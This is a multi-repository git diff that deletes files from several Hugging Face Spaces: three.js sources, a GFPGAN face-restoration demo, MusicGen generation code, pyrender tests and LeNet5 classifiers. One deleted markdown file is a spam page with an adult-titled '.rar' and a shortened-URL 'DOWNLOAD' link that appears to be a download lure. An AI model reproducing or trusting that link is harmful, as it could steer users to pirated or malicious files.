- - } else { - - animations.push( json.animations ); - - } - - } - - for ( var i = 0; i < animations.length; i ++ ) { - - var clip = THREE.AnimationClip.parseAnimation( animations[ i ], geometry.bones ); - if ( clip ) outputAnimations.push( clip ); - - } - - // parse implicit morph animations - if ( geometry.morphTargets ) { - - // TODO: Figure out what an appropraite FPS is for morph target animations -- defaulting to 10, but really it is completely arbitrary. 
- var morphAnimationClips = THREE.AnimationClip.CreateClipsFromMorphTargetSequences( geometry.morphTargets, 10 ); - outputAnimations = outputAnimations.concat( morphAnimationClips ); - - } - - if ( outputAnimations.length > 0 ) geometry.animations = outputAnimations; - - } - - return function parse( json, path ) { - - if ( json.data !== undefined ) { - - // Geometry 4.0 spec - json = json.data; - - } - - if ( json.scale !== undefined ) { - - json.scale = 1.0 / json.scale; - - } else { - - json.scale = 1.0; - - } - - var geometry = new THREE.Geometry(); - - parseModel( json, geometry ); - parseSkin( json, geometry ); - parseMorphing( json, geometry ); - parseAnimations( json, geometry ); - - geometry.computeFaceNormals(); - geometry.computeBoundingSphere(); - - if ( json.materials === undefined || json.materials.length === 0 ) { - - return { geometry: geometry }; - - } else { - - var materials = THREE.Loader.prototype.initMaterials( json.materials, this.resourcePath || path, this.crossOrigin ); - - return { geometry: geometry, materials: materials }; - - } - - }; - - } )() - - } ); - - return LegacyJSONLoader; - -} )(); diff --git a/spaces/banana-projects/web3d/node_modules/three/src/core/EventDispatcher.js b/spaces/banana-projects/web3d/node_modules/three/src/core/EventDispatcher.js deleted file mode 100644 index de5ca8ecf376970256074a1d9e16545cf03e29a8..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/core/EventDispatcher.js +++ /dev/null @@ -1,86 +0,0 @@ -/** - * https://github.com/mrdoob/eventdispatcher.js/ - */ - -function EventDispatcher() {} - -Object.assign( EventDispatcher.prototype, { - - addEventListener: function ( type, listener ) { - - if ( this._listeners === undefined ) this._listeners = {}; - - var listeners = this._listeners; - - if ( listeners[ type ] === undefined ) { - - listeners[ type ] = []; - - } - - if ( listeners[ type ].indexOf( listener ) === - 1 ) { - - listeners[ type ].push( listener ); - - } - - }, - - hasEventListener: function ( type, listener ) { - - if ( this._listeners === undefined ) return false; - - var listeners = this._listeners; - - return listeners[ type ] !== undefined && listeners[ type ].indexOf( listener ) !== - 1; - - }, - - removeEventListener: function ( type, listener ) { - - if ( this._listeners === undefined ) return; - - var listeners = this._listeners; - var listenerArray = listeners[ type ]; - - if ( listenerArray !== undefined ) { - - var index = listenerArray.indexOf( listener ); - - if ( index !== - 1 ) { - - listenerArray.splice( index, 1 ); - - } - - } - - }, - - dispatchEvent: function ( event ) { - - if ( this._listeners === undefined ) return; - - var listeners = this._listeners; - var listenerArray = listeners[ event.type ]; - - if ( listenerArray !== undefined ) { - - event.target = this; - - var array = listenerArray.slice( 0 ); - - for ( var i = 0, l = array.length; i < l; i ++ ) { - - array[ i ].call( this, event ); - - } - - } - - } - -} ); - - -export { EventDispatcher }; diff --git a/spaces/banana-projects/web3d/node_modules/three/src/extras/curves/ArcCurve.d.ts b/spaces/banana-projects/web3d/node_modules/three/src/extras/curves/ArcCurve.d.ts deleted file mode 100644 index 985917215ff44c33488f4ff33d28db2534eda1ca..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/extras/curves/ArcCurve.d.ts +++ /dev/null @@ -1,11 +0,0 @@ -import { EllipseCurve } from './EllipseCurve'; -export class ArcCurve extends EllipseCurve { - 
constructor( - aX: number, - aY: number, - aRadius: number, - aStartAngle: number, - aEndAngle: number, - aClockwise: boolean - ); -} diff --git a/spaces/banana-projects/web3d/node_modules/three/src/textures/DataTexture3D.js b/spaces/banana-projects/web3d/node_modules/three/src/textures/DataTexture3D.js deleted file mode 100644 index d34a3ab4e0094482ebc25077abdcad31b19ce58e..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/textures/DataTexture3D.js +++ /dev/null @@ -1,36 +0,0 @@ -/** - * @author Artur Trzesiok - */ - -import { Texture } from './Texture.js'; -import { ClampToEdgeWrapping, NearestFilter } from '../constants.js'; - -function DataTexture3D( data, width, height, depth ) { - - // We're going to add .setXXX() methods for setting properties later. - // Users can still set in DataTexture3D directly. - // - // var texture = new THREE.DataTexture3D( data, width, height, depth ); - // texture.anisotropy = 16; - // - // See #14839 - - Texture.call( this, null ); - - this.image = { data: data, width: width, height: height, depth: depth }; - - this.magFilter = NearestFilter; - this.minFilter = NearestFilter; - - this.wrapR = ClampToEdgeWrapping; - - this.generateMipmaps = false; - this.flipY = false; - -} - -DataTexture3D.prototype = Object.create( Texture.prototype ); -DataTexture3D.prototype.constructor = DataTexture3D; -DataTexture3D.prototype.isDataTexture3D = true; - -export { DataTexture3D }; diff --git a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327004219.py b/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327004219.py deleted file mode 100644 index ed58c5e4509e8d73173deacd2716986623b3f65e..0000000000000000000000000000000000000000 --- a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327004219.py +++ /dev/null @@ -1,65 +0,0 @@ -import os -#os.system("pip install gfpgan") - -#os.system("pip freeze") -#os.system("wget https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth -P .") -import random -import gradio as gr -from PIL import Image -import torch -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/ab/Abraham_Lincoln_O-77_matte_collodion_print.jpg/1024px-Abraham_Lincoln_O-77_matte_collodion_print.jpg', 'lincoln.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/5/50/Albert_Einstein_%28Nobel%29.png', 'einstein.png') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/9/9d/Thomas_Edison2.jpg/1024px-Thomas_Edison2.jpg', 'edison.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Henry_Ford_1888.jpg/1024px-Henry_Ford_1888.jpg', 'Henry.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg/800px-Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg', 'Frida.jpg') - - - - -import cv2 -import glob -import numpy as np -from basicsr.utils import imwrite -from gfpgan import GFPGANer - -import warnings -warnings.warn('The unoptimized RealESRGAN is very slow on CPU. We do not use it. 
' - 'If you really want to use it, please modify the corresponding codes.') -bg_upsampler = None - - - -# set up GFPGAN restorer -restorer = GFPGANer( - model_path='experiments/pretrained_models/GFPGANv1.3.pth', - upscale=2, - arch='clean', - channel_multiplier=2, - bg_upsampler=bg_upsampler) - - -def inference(img): - input_img = cv2.imread(img, cv2.IMREAD_COLOR) - restored_img = restorer.enhance( - input_img, has_aligned=False, only_center_face=False, paste_back=True) - - return Image.fromarray(restored_img[0][:,:,::-1]) - -title = "GFP-GAN" -description = "Gradio demo for GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below. Please click submit only once" -article = "

Towards Real-World Blind Face Restoration with Generative Facial Prior | Github Repo

visitor badge
" -gr.Interface( - inference, - [gr.inputs.Image(type="filepath", label="Input")], - gr.outputs.Image(type="pil", label="Output"), - title=title, - description=description, - article=article, - examples=[ - ['lincoln.jpg'], - ['einstein.png'], - ['edison.jpg'], - ['Henry.jpg'], - ['Frida.jpg'] - ] - ).launch(enable_queue=True,cache_examples=True) \ No newline at end of file diff --git a/spaces/bioriAsaeru/text-to-voice/CreampieThais.com - Minno (HD).rar [HOT].md b/spaces/bioriAsaeru/text-to-voice/CreampieThais.com - Minno (HD).rar [HOT].md deleted file mode 100644 index d375e39819fe3ad9ac5e7f89cfa070ce4eff8f71..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/CreampieThais.com - Minno (HD).rar [HOT].md +++ /dev/null @@ -1,6 +0,0 @@ -

CreampieThais.com - Minno (HD).rar


DOWNLOAD ::: https://urloso.com/2uyQk7



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/brainblow/MusiCreator/audiocraft/models/musicgen.py b/spaces/brainblow/MusiCreator/audiocraft/models/musicgen.py deleted file mode 100644 index 007dd9e0ed1cfd359fb4889e7f4108248e189941..0000000000000000000000000000000000000000 --- a/spaces/brainblow/MusiCreator/audiocraft/models/musicgen.py +++ /dev/null @@ -1,362 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Main model for using MusicGen. This will combine all the required components -and provide easy access to the generation API. -""" - -import os -import typing as tp - -import torch - -from .encodec import CompressionModel -from .lm import LMModel -from .builders import get_debug_compression_model, get_debug_lm_model -from .loaders import load_compression_model, load_lm_model, HF_MODEL_CHECKPOINTS_MAP -from ..data.audio_utils import convert_audio -from ..modules.conditioners import ConditioningAttributes, WavCondition -from ..utils.autocast import TorchAutocast - - -MelodyList = tp.List[tp.Optional[torch.Tensor]] -MelodyType = tp.Union[torch.Tensor, MelodyList] - - -class MusicGen: - """MusicGen main model with convenient generation API. - - Args: - name (str): name of the model. - compression_model (CompressionModel): Compression model - used to map audio to invertible discrete representations. - lm (LMModel): Language model over discrete representations. - """ - def __init__(self, name: str, compression_model: CompressionModel, lm: LMModel, - max_duration: float = 30): - self.name = name - self.compression_model = compression_model - self.lm = lm - self.max_duration = max_duration - self.device = next(iter(lm.parameters())).device - self.generation_params: dict = {} - self.set_generation_params(duration=15) # 15 seconds by default - self._progress_callback: tp.Optional[tp.Callable[[int, int], None]] = None - if self.device.type == 'cpu': - self.autocast = TorchAutocast(enabled=False) - else: - self.autocast = TorchAutocast( - enabled=True, device_type=self.device.type, dtype=torch.float16) - - @property - def frame_rate(self) -> int: - """Roughly the number of AR steps per seconds.""" - return self.compression_model.frame_rate - - @property - def sample_rate(self) -> int: - """Sample rate of the generated audio.""" - return self.compression_model.sample_rate - - @property - def audio_channels(self) -> int: - """Audio channels of the generated audio.""" - return self.compression_model.channels - - @staticmethod - def get_pretrained(name: str = 'melody', device=None): - """Return pretrained model, we provide four models: - - small (300M), text to music, # see: https://huggingface.co/facebook/musicgen-small - - medium (1.5B), text to music, # see: https://huggingface.co/facebook/musicgen-medium - - melody (1.5B) text to music and text+melody to music, # see: https://huggingface.co/facebook/musicgen-melody - - large (3.3B), text to music, # see: https://huggingface.co/facebook/musicgen-large - """ - - if device is None: - if torch.cuda.device_count(): - device = 'cuda' - else: - device = 'cpu' - - if name == 'debug': - # used only for unit tests - compression_model = get_debug_compression_model(device) - lm = get_debug_lm_model(device) - return MusicGen(name, compression_model, lm) - - if name not in HF_MODEL_CHECKPOINTS_MAP: - if not os.path.isfile(name) and not os.path.isdir(name): - raise ValueError( - f"{name} is not a valid checkpoint name. 
" - f"Choose one of {', '.join(HF_MODEL_CHECKPOINTS_MAP.keys())}" - ) - - cache_dir = os.environ.get('MUSICGEN_ROOT', None) - compression_model = load_compression_model(name, device=device, cache_dir=cache_dir) - lm = load_lm_model(name, device=device, cache_dir=cache_dir) - if name == 'melody': - lm.condition_provider.conditioners['self_wav'].match_len_on_eval = True - - return MusicGen(name, compression_model, lm) - - def set_generation_params(self, use_sampling: bool = True, top_k: int = 250, - top_p: float = 0.0, temperature: float = 1.0, - duration: float = 30.0, cfg_coef: float = 3.0, - two_step_cfg: bool = False, extend_stride: float = 18): - """Set the generation parameters for MusicGen. - - Args: - use_sampling (bool, optional): Use sampling if True, else do argmax decoding. Defaults to True. - top_k (int, optional): top_k used for sampling. Defaults to 250. - top_p (float, optional): top_p used for sampling, when set to 0 top_k is used. Defaults to 0.0. - temperature (float, optional): Softmax temperature parameter. Defaults to 1.0. - duration (float, optional): Duration of the generated waveform. Defaults to 30.0. - cfg_coef (float, optional): Coefficient used for classifier free guidance. Defaults to 3.0. - two_step_cfg (bool, optional): If True, performs 2 forward for Classifier Free Guidance, - instead of batching together the two. This has some impact on how things - are padded but seems to have little impact in practice. - extend_stride: when doing extended generation (i.e. more than 30 seconds), by how much - should we extend the audio each time. Larger values will mean less context is - preserved, and shorter value will require extra computations. - """ - assert extend_stride < self.max_duration, "Cannot stride by more than max generation duration." - self.extend_stride = extend_stride - self.duration = duration - self.generation_params = { - 'use_sampling': use_sampling, - 'temp': temperature, - 'top_k': top_k, - 'top_p': top_p, - 'cfg_coef': cfg_coef, - 'two_step_cfg': two_step_cfg, - } - - def set_custom_progress_callback(self, progress_callback: tp.Optional[tp.Callable[[int, int], None]] = None): - """Override the default progress callback.""" - self._progress_callback = progress_callback - - def generate_unconditional(self, num_samples: int, progress: bool = False) -> torch.Tensor: - """Generate samples in an unconditional manner. - - Args: - num_samples (int): Number of samples to be generated. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - descriptions: tp.List[tp.Optional[str]] = [None] * num_samples - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions, None) - return self._generate_tokens(attributes, prompt_tokens, progress) - - def generate(self, descriptions: tp.List[str], progress: bool = False) -> torch.Tensor: - """Generate samples conditioned on text. - - Args: - descriptions (tp.List[str]): A list of strings used as text conditioning. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions, None) - assert prompt_tokens is None - return self._generate_tokens(attributes, prompt_tokens, progress) - - def generate_with_chroma(self, descriptions: tp.List[str], melody_wavs: MelodyType, - melody_sample_rate: int, progress: bool = False) -> torch.Tensor: - """Generate samples conditioned on text and melody. 
- - Args: - descriptions (tp.List[str]): A list of strings used as text conditioning. - melody_wavs: (torch.Tensor or list of Tensor): A batch of waveforms used as - melody conditioning. Should have shape [B, C, T] with B matching the description length, - C=1 or 2. It can be [C, T] if there is a single description. It can also be - a list of [C, T] tensors. - melody_sample_rate: (int): Sample rate of the melody waveforms. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - if isinstance(melody_wavs, torch.Tensor): - if melody_wavs.dim() == 2: - melody_wavs = melody_wavs[None] - if melody_wavs.dim() != 3: - raise ValueError("Melody wavs should have a shape [B, C, T].") - melody_wavs = list(melody_wavs) - else: - for melody in melody_wavs: - if melody is not None: - assert melody.dim() == 2, "One melody in the list has the wrong number of dims." - - melody_wavs = [ - convert_audio(wav, melody_sample_rate, self.sample_rate, self.audio_channels) - if wav is not None else None - for wav in melody_wavs] - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions=descriptions, prompt=None, - melody_wavs=melody_wavs) - assert prompt_tokens is None - return self._generate_tokens(attributes, prompt_tokens, progress) - - def generate_continuation(self, prompt: torch.Tensor, prompt_sample_rate: int, - descriptions: tp.Optional[tp.List[tp.Optional[str]]] = None, - progress: bool = False) -> torch.Tensor: - """Generate samples conditioned on audio prompts. - - Args: - prompt (torch.Tensor): A batch of waveforms used for continuation. - Prompt should be [B, C, T], or [C, T] if only one sample is generated. - prompt_sample_rate (int): Sampling rate of the given audio waveforms. - descriptions (tp.List[str], optional): A list of strings used as text conditioning. Defaults to None. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - if prompt.dim() == 2: - prompt = prompt[None] - if prompt.dim() != 3: - raise ValueError("prompt should have 3 dimensions: [B, C, T] (C = 1).") - prompt = convert_audio(prompt, prompt_sample_rate, self.sample_rate, self.audio_channels) - if descriptions is None: - descriptions = [None] * len(prompt) - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions, prompt) - assert prompt_tokens is not None - return self._generate_tokens(attributes, prompt_tokens, progress) - - @torch.no_grad() - def _prepare_tokens_and_attributes( - self, - descriptions: tp.Sequence[tp.Optional[str]], - prompt: tp.Optional[torch.Tensor], - melody_wavs: tp.Optional[MelodyList] = None, - ) -> tp.Tuple[tp.List[ConditioningAttributes], tp.Optional[torch.Tensor]]: - """Prepare model inputs. - - Args: - descriptions (tp.List[str]): A list of strings used as text conditioning. - prompt (torch.Tensor): A batch of waveforms used for continuation. - melody_wavs (tp.Optional[torch.Tensor], optional): A batch of waveforms - used as melody conditioning. Defaults to None. - """ - attributes = [ - ConditioningAttributes(text={'description': description}) - for description in descriptions] - - if melody_wavs is None: - for attr in attributes: - attr.wav['self_wav'] = WavCondition( - torch.zeros((1, 1), device=self.device), - torch.tensor([0], device=self.device), - path='null_wav') # type: ignore - else: - if self.name != "melody": - raise RuntimeError("This model doesn't support melody conditioning. 
" - "Use the `melody` model.") - assert len(melody_wavs) == len(descriptions), \ - f"number of melody wavs must match number of descriptions! " \ - f"got melody len={len(melody_wavs)}, and descriptions len={len(descriptions)}" - for attr, melody in zip(attributes, melody_wavs): - if melody is None: - attr.wav['self_wav'] = WavCondition( - torch.zeros((1, 1), device=self.device), - torch.tensor([0], device=self.device), - path='null_wav') # type: ignore - else: - attr.wav['self_wav'] = WavCondition( - melody.to(device=self.device), - torch.tensor([melody.shape[-1]], device=self.device)) - - if prompt is not None: - if descriptions is not None: - assert len(descriptions) == len(prompt), "Prompt and nb. descriptions doesn't match" - prompt = prompt.to(self.device) - prompt_tokens, scale = self.compression_model.encode(prompt) - assert scale is None - else: - prompt_tokens = None - return attributes, prompt_tokens - - def _generate_tokens(self, attributes: tp.List[ConditioningAttributes], - prompt_tokens: tp.Optional[torch.Tensor], progress: bool = False) -> torch.Tensor: - """Generate discrete audio tokens given audio prompt and/or conditions. - - Args: - attributes (tp.List[ConditioningAttributes]): Conditions used for generation (text/melody). - prompt_tokens (tp.Optional[torch.Tensor]): Audio prompt used for continuation. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - Returns: - torch.Tensor: Generated audio, of shape [B, C, T], T is defined by the generation params. - """ - total_gen_len = int(self.duration * self.frame_rate) - max_prompt_len = int(min(self.duration, self.max_duration) * self.frame_rate) - current_gen_offset: int = 0 - - def _progress_callback(generated_tokens: int, tokens_to_generate: int): - generated_tokens += current_gen_offset - if self._progress_callback is not None: - # Note that total_gen_len might be quite wrong depending on the - # codebook pattern used, but with delay it is almost accurate. - self._progress_callback(generated_tokens, total_gen_len) - else: - print(f'{generated_tokens: 6d} / {total_gen_len: 6d}', end='\r') - - if prompt_tokens is not None: - assert max_prompt_len >= prompt_tokens.shape[-1], \ - "Prompt is longer than audio to generate" - - callback = None - if progress: - callback = _progress_callback - - if self.duration <= self.max_duration: - # generate by sampling from LM, simple case. - with self.autocast: - gen_tokens = self.lm.generate( - prompt_tokens, attributes, - callback=callback, max_gen_len=total_gen_len, **self.generation_params) - - else: - # now this gets a bit messier, we need to handle prompts, - # melody conditioning etc. - ref_wavs = [attr.wav['self_wav'] for attr in attributes] - all_tokens = [] - if prompt_tokens is None: - prompt_length = 0 - else: - all_tokens.append(prompt_tokens) - prompt_length = prompt_tokens.shape[-1] - - stride_tokens = int(self.frame_rate * self.extend_stride) - - while current_gen_offset + prompt_length < total_gen_len: - time_offset = current_gen_offset / self.frame_rate - chunk_duration = min(self.duration - time_offset, self.max_duration) - max_gen_len = int(chunk_duration * self.frame_rate) - for attr, ref_wav in zip(attributes, ref_wavs): - wav_length = ref_wav.length.item() - if wav_length == 0: - continue - # We will extend the wav periodically if it not long enough. - # we have to do it here rather than in conditioners.py as otherwise - # we wouldn't have the full wav. 
- initial_position = int(time_offset * self.sample_rate) - wav_target_length = int(self.max_duration * self.sample_rate) - print(initial_position / self.sample_rate, wav_target_length / self.sample_rate) - positions = torch.arange(initial_position, - initial_position + wav_target_length, device=self.device) - attr.wav['self_wav'] = WavCondition( - ref_wav[0][:, positions % wav_length], - torch.full_like(ref_wav[1], wav_target_length)) - with self.autocast: - gen_tokens = self.lm.generate( - prompt_tokens, attributes, - callback=callback, max_gen_len=max_gen_len, **self.generation_params) - if prompt_tokens is None: - all_tokens.append(gen_tokens) - else: - all_tokens.append(gen_tokens[:, :, prompt_tokens.shape[-1]:]) - prompt_tokens = gen_tokens[:, :, stride_tokens:] - prompt_length = prompt_tokens.shape[-1] - current_gen_offset += stride_tokens - - gen_tokens = torch.cat(all_tokens, dim=-1) - - # generate audio - assert gen_tokens.dim() == 3 - with torch.no_grad(): - gen_audio = self.compression_model.decode(gen_tokens, None) - return gen_audio diff --git a/spaces/brjathu/HMR2.0/vendor/pyrender/tests/unit/test_cameras.py b/spaces/brjathu/HMR2.0/vendor/pyrender/tests/unit/test_cameras.py deleted file mode 100644 index 7544ad8f8e3ee55236fd2e32dbc12065153cbe5b..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/pyrender/tests/unit/test_cameras.py +++ /dev/null @@ -1,164 +0,0 @@ -import numpy as np -import pytest - -from pyrender import PerspectiveCamera, OrthographicCamera - - -def test_perspective_camera(): - - # Set up constants - znear = 0.05 - zfar = 100 - yfov = np.pi / 3.0 - width = 1000.0 - height = 500.0 - aspectRatio = 640.0 / 480.0 - - # Test basics - with pytest.raises(TypeError): - p = PerspectiveCamera() - - p = PerspectiveCamera(yfov=yfov) - assert p.yfov == yfov - assert p.znear == 0.05 - assert p.zfar is None - assert p.aspectRatio is None - p.name = 'asdf' - p.name = None - - with pytest.raises(ValueError): - p.yfov = 0.0 - - with pytest.raises(ValueError): - p.yfov = -1.0 - - with pytest.raises(ValueError): - p.znear = -1.0 - - p.znear = 0.0 - p.znear = 0.05 - p.zfar = 100.0 - assert p.zfar == 100.0 - - with pytest.raises(ValueError): - p.zfar = 0.03 - - with pytest.raises(ValueError): - p.zfar = 0.05 - - p.aspectRatio = 10.0 - assert p.aspectRatio == 10.0 - - with pytest.raises(ValueError): - p.aspectRatio = 0.0 - - with pytest.raises(ValueError): - p.aspectRatio = -1.0 - - # Test matrix getting/setting - - # NF - p.znear = 0.05 - p.zfar = 100 - p.aspectRatio = None - - with pytest.raises(ValueError): - p.get_projection_matrix() - - assert np.allclose( - p.get_projection_matrix(width, height), - np.array([ - [1.0 / (width / height * np.tan(yfov / 2.0)), 0.0, 0.0, 0.0], - [0.0, 1.0 / np.tan(yfov / 2.0), 0.0, 0.0], - [0.0, 0.0, (zfar + znear) / (znear - zfar), - (2 * zfar * znear) / (znear - zfar)], - [0.0, 0.0, -1.0, 0.0] - ]) - ) - - # NFA - p.aspectRatio = aspectRatio - assert np.allclose( - p.get_projection_matrix(width, height), - np.array([ - [1.0 / (aspectRatio * np.tan(yfov / 2.0)), 0.0, 0.0, 0.0], - [0.0, 1.0 / np.tan(yfov / 2.0), 0.0, 0.0], - [0.0, 0.0, (zfar + znear) / (znear - zfar), - (2 * zfar * znear) / (znear - zfar)], - [0.0, 0.0, -1.0, 0.0] - ]) - ) - assert np.allclose( - p.get_projection_matrix(), p.get_projection_matrix(width, height) - ) - - # N - p.zfar = None - p.aspectRatio = None - assert np.allclose( - p.get_projection_matrix(width, height), - np.array([ - [1.0 / (width / height * np.tan(yfov / 2.0)), 0.0, 0.0, 0.0], - 
[0.0, 1.0 / np.tan(yfov / 2.0), 0.0, 0.0], - [0.0, 0.0, -1.0, -2.0 * znear], - [0.0, 0.0, -1.0, 0.0] - ]) - ) - - -def test_orthographic_camera(): - xm = 1.0 - ym = 2.0 - n = 0.05 - f = 100.0 - - with pytest.raises(TypeError): - c = OrthographicCamera() - - c = OrthographicCamera(xmag=xm, ymag=ym) - - assert c.xmag == xm - assert c.ymag == ym - assert c.znear == 0.05 - assert c.zfar == 100.0 - assert c.name is None - - with pytest.raises(TypeError): - c.ymag = None - - with pytest.raises(ValueError): - c.ymag = 0.0 - - with pytest.raises(ValueError): - c.ymag = -1.0 - - with pytest.raises(TypeError): - c.xmag = None - - with pytest.raises(ValueError): - c.xmag = 0.0 - - with pytest.raises(ValueError): - c.xmag = -1.0 - - with pytest.raises(TypeError): - c.znear = None - - with pytest.raises(ValueError): - c.znear = 0.0 - - with pytest.raises(ValueError): - c.znear = -1.0 - - with pytest.raises(ValueError): - c.zfar = 0.01 - - assert np.allclose( - c.get_projection_matrix(), - np.array([ - [1.0 / xm, 0, 0, 0], - [0, 1.0 / ym, 0, 0], - [0, 0, 2.0 / (n - f), (f + n) / (n - f)], - [0, 0, 0, 1.0] - ]) - ) diff --git a/spaces/camenduru-com/seamless/index.html b/spaces/camenduru-com/seamless/index.html deleted file mode 100644 index 1e8aecdea8a3bbaddfc715d5a7b4c33ec2b7d394..0000000000000000000000000000000000000000 --- a/spaces/camenduru-com/seamless/index.html +++ /dev/null @@ -1,119 +0,0 @@ - - - - - - Unity WebGL Player | seamless - - - - -
- -
- -
-
-
-
-
- -
- - - diff --git a/spaces/cancanasoyak/CropBased-TissueMasking/Deployment/model/LeNet5_different_inputSizes.py b/spaces/cancanasoyak/CropBased-TissueMasking/Deployment/model/LeNet5_different_inputSizes.py deleted file mode 100644 index 79c0e8421383bf60420c8bfa5c3a70d42bf42915..0000000000000000000000000000000000000000 --- a/spaces/cancanasoyak/CropBased-TissueMasking/Deployment/model/LeNet5_different_inputSizes.py +++ /dev/null @@ -1,115 +0,0 @@ -import torch -import torch.nn as nn - -############################################################################################################### -class LeNet5_128(nn.Module): - def __init__(self): - super(LeNet5_128, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 128x128 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 128x128 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 32 * 32 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x -############################################################################################################### -class LeNet5_64(nn.Module): - def __init__(self): - super(LeNet5_64, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 64x64 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 64x64 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 16 * 16 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x -############################################################################################################### -class LeNet5_32(nn.Module): - def __init__(self): - super(LeNet5_32, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 32x32 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 32x32 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 8 * 8 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - 
return x -############################################################################################################### -class LeNet5_16(nn.Module): - def __init__(self): - super(LeNet5_16, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 16x16 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 16x16 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 4 * 4 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x - -############################################################################################################### -############################################################################################################### - -# Function to select the appropriate model based on input size -def select_model(input_size): - if input_size == 128: - return LeNet5_128() - elif input_size == 64: - return LeNet5_64() - elif input_size == 32: - return LeNet5_32() - elif input_size == 16: - return LeNet5_16() - else: - raise ValueError("Unsupported input size") \ No newline at end of file diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/DensePose/densepose/data/samplers/densepose_cse_confidence_based.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/DensePose/densepose/data/samplers/densepose_cse_confidence_based.py deleted file mode 100644 index 964b7f4ac41d2e1bb3da1cf6861af7f644b859fc..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/DensePose/densepose/data/samplers/densepose_cse_confidence_based.py +++ /dev/null @@ -1,119 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. - -import random 